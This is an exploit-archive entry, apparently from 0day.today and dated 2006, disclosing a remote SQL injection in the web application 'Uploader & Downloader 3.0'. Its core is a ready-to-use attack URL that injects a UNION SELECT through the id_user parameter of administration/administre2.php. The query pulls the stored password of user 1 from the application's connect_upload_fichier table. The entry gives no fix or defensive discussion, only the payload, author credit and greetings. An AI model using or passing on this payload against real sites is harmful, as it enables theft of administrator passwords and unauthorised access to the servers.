id: 1268
date: 12/18/2006
title: Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability
author: the master
cves: 

======================================================================
Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability
======================================================================




########################################################################
#  uploader&downloader v3  Remote SQL Injection Vulnerability
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/administration/administre2.php?id_user=-1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload_fichier%20WHERE%20id_user=1
#
#  Greetz:   Dr Max Virus , Kacper
########################################################################



#  0day.today [2023-03-26]  #